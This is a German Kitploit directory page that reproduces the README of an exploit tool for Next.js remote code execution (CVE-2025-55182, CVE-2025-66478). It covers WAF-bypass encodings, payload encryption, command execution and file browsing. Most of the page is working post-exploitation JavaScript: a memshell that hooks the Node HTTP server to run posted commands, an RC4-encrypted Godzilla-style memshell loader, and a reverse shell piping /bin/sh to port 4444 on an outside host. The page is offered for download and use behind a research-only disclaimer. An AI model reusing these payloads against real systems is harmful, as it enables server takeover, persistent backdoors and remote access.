Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Nextjs_RCE_Exploit_Tool — Exploit für CVE-2025-55182 & CVE-2025-66478 | Kitploit
Tools/GitHubGitHub/pyroxenites/nextjs_rce_exploit_tool
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsCommand and ControlLernen & BildungRed TeamingPayload-Entwicklung
GitHubpyroxenites/nextjs_rce_exploit_tool

Nextjs_RCE_Exploit_Tool

Exploit für CVE-2025-55182 & CVE-2025-66478

14136vor 8 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Next.js RCE Exploit Tool (CVE-2025-55182)


[!CAUTION] Haftungsausschluss / Disclaimer

Dieses Tool ist ausschließlich für Sicherheitsforschung und -schulung bestimmt. Bei der Verwendung dieses Tools zu Testzwecken müssen Sie sicherstellen, dass Sie über die rechtmäßige Autorisierung für das Zielsystem verfügen.

Die Verwendung für nicht autorisierte Penetrationstests, böswillige Angriffe oder andere illegale Zwecke ist strengstens untersagt. Alle Risiken und rechtlichen Konsequenzen im Zusammenhang mit der Erkennung und Ausnutzung von Schwachstellen trägt der Benutzer in eigener Verantwortung; der Entwickler dieses Projekts übernimmt hierfür keinerlei Haftung.

Wenn Sie diese Bedingungen nicht akzeptieren, beenden Sie bitte sofort das Herunterladen oder die Verwendung dieses Tools.

Dieses Tool wurde auf der Grundlage öffentlicher Artikel entwickelt. Es werden keine vorkompilierten Binärversionen bereitgestellt. Bitte prüfen Sie den Code selbst und kompilieren Sie ihn.


🙏 Danksagung / Credits

Die Kernlogik und die Bypass-Ansätze dieses Tools sind stark von Sicherheitsforschern aus der Community inspiriert. Unser aufrichtiger Dank gilt den folgenden Experten:

  • @maple3142
  • @lachlan2k (React2Shell)
  • @phithon (P牛)

✨ Funktionen / Features

  • Unterstützte Exploit-Ketten:
    • Prototype Chain
    • Array Map Chain
  • WAF-Bypass:
    • ✅ Unicode-Kodierung
    • ✅ UTF-16LE-Kodierung
  • OpSec:
    • 🔐 AES-Payload-Verschlüsselung
  • Toolbox:
    • Befehlsausführung: Unterstützt den synchronen (execSync) und asynchronen (exec) Modus.
    • Dateiverwaltung: Explorer-ähnliche Oberfläche mit Unterstützung zum Durchsuchen, Lesen und Schreiben von Dateien.
    • Erweiterte Ausnutzung: Unterstützt native JS-Codeausführung und Modulladen (module._load).

🛠️ Schnellstart

1. Schwachstellenprüfung (Nuclei)

Verwenden Sie Nuclei für massenweises Fingerprinting und die Schwachstellenprüfung:

root@kitploit:~
nuclei -l urls.txt -t CVE-2025-55182.yaml -o result.txt

2. Kompilieren und Ausführen

root@kitploit:~
# 整理依赖
go mod tidy

# 编译
go build -ldflags="-s -w" -o ReactExploit cmd/main.go

# 运行
./ReactExploit

📸 Funktions-Screenshots / Screenshots

1. Kodierung

Config & WAF Bypass

2. Befehlsausführung (RCE)

RCE

3. Datei-Explorer

File Explorer File Read

4. Fortgeschrittene Nutzung (Native JS Eval)

JS Eval Module Load

💉 Payload-Beispiele

Im Modul „Erweiterte Ausnutzung -> Native JS-Codeausführung“ können Sie die folgenden Payloads für Post-Exploitation-Aktivitäten verwenden.

1. Memshell-Injektion

cmdlinux

root@kitploit:~
(function(){
    try {
        if (global.memshell_active) return "Memshell already active!";
        var http = process.mainModule.require('http');
        var cp = process.mainModule.require('child_process');
        var qs = process.mainModule.require('querystring');
        var originalEmit = http.Server.prototype.emit;
        http.Server.prototype.emit = function(event, req, res) {
            if (event === 'request' && req && res) {
                var url = req.url || "";
                if (req.method === 'POST' && url.indexOf('/?pass') !== -1) {
                    var bodyArr = [];
                    req.on('data', function(chunk) {
                        bodyArr.push(chunk);
                    });
                    req.on('end', function() {
                        try {
                            var bodyStr = Buffer.concat(bodyArr).toString();
                            var postData = qs.parse(bodyStr);
                            var cmd = postData['pwd'];
                            if (cmd) {
                                var output = cp.execSync(cmd).toString();
                                res.writeHead(200, {'Content-Type': 'text/plain'});
                                res.end(output);
                            } else {
                                res.writeHead(400);
                                res.end("Parameter 'pwd' is missing.");
                            }
                        } catch (e) {
                            res.writeHead(500);
                            res.end("Error: " + e.message);
                        }
                    });
                    return true;
                }
            }
            return originalEmit.apply(this, arguments);
        };
        global.memshell_active = true;
        return "Memshell injected!";
    } catch (e) {
        return "Injection failed: " + e.message;
    }
})()

https://github.com/BeichenDream/GodzillaNodeJsPayload

root@kitploit:~
(function() {
    try {
        if (global.godzilla_memshell_hooked) return "Memshell already hooked!";
        var http = process.mainModule.require('http');
        var secretKey = '3c6e0b8a9c15224a'; 
        var payloadName = 'ge0b8a';
        function rc4(key, data) {
            var s = Array(256), k = Array(256);
            var i, j = 0, tmp;
            for (i = 0; i < 256; i++) {
                s[i] = i;
                k[i] = key.charCodeAt(i % key.length);
            }
            for (i = 0; i < 256; i++) {
                j = (j + s[i] + k[i]) % 256;
                tmp = s[i];
                s[i] = s[j];
                s[j] = tmp;
            }
            i = j = 0;
            var out = Buffer.alloc(data.length);
            for (var idx = 0; idx < data.length; idx++) {
                i = (i + 1) % 256;
                j = (j + s[i]) % 256;
                tmp = s[i];
                s[i] = s[j];
                s[j] = tmp;
                var t = (s[i] + s[j]) % 256;
                out[idx] = data[idx] ^ s[t];
            }
            return out;
        }
        var originalEmit = http.Server.prototype.emit;
        http.Server.prototype.emit = function(event, req, res) {
            if (event === 'request' && req && res && req.method === 'POST' && (req.url || "").indexOf('/76f03711') !== -1) {
                var bodyArr = [];
                req.on('data', function(chunk) {
                    bodyArr.push(chunk);
                });
                req.on('end', async function() {
                    try {
                        var bodyStr = Buffer.concat(bodyArr).toString();
                        var json = JSON.parse(bodyStr);

                        if (json.data) {
                            var dataBuf = Buffer.from(json.data, 'base64');
                            var rawBody = rc4(secretKey, dataBuf);
                            if (global[payloadName] === undefined) {
                                try {
                                    var tmpPayload = new Function(rawBody.toString())();
                                    if (typeof tmpPayload === "object" && typeof tmpPayload.process === "function") {
                                        global[payloadName] = tmpPayload;
                                    }
                                } catch (err) {
                                }
                            }
                            if (global[payloadName] !== undefined) {
                                var result = await global[payloadName]['process'].call(global[payloadName], rawBody);
                                var resultBuf = Buffer.isBuffer(result) ? result : Buffer.from(String(result));
                                var encResult = rc4(secretKey, resultBuf);
                                res.writeHead(200, {'Content-Type': 'application/json'});
                                res.end(JSON.stringify({ "data": encResult.toString("base64") }));
                                return;
                            }
                        }
                    } catch (e) {
                    }
                   
                    res.writeHead(200, {'Content-Type': 'application/json'});
                    res.end(JSON.stringify({data: null}));
                });
                return true;
            }
            return originalEmit.apply(this, arguments);
        };
        global.godzilla_memshell_hooked = true;
        return "Godzilla Loader-Mode Memshell injected!";
    } catch (e) {
        return "Injection failed: " + e.message;
    }
})()

2. Reverse Shell

root@kitploit:~
(function(){
    try {
        var net = process.mainModule.require('net');
        var cp = process.mainModule.require('child_process');
        // 可根据环境修改为 /bin/bash
        var sh = cp.spawn('/bin/sh', ['-i']);
        var client = new net.Socket();
        
        client.on('error', function(err) {
            if (sh) sh.kill(); 
        });
        sh.on('error', function(err) {
            if (client) client.destroy();
        });
        
        client.connect(4444, 'x.x.x.x', function(){
            client.pipe(sh.stdin);
            sh.stdout.pipe(client);
            sh.stderr.pipe(client);
        });
        return "Spawned successfully (Async)";
    } catch (e) {
        return "Failed to spawn: " + e.message;
    }
})();

Tool herunterladen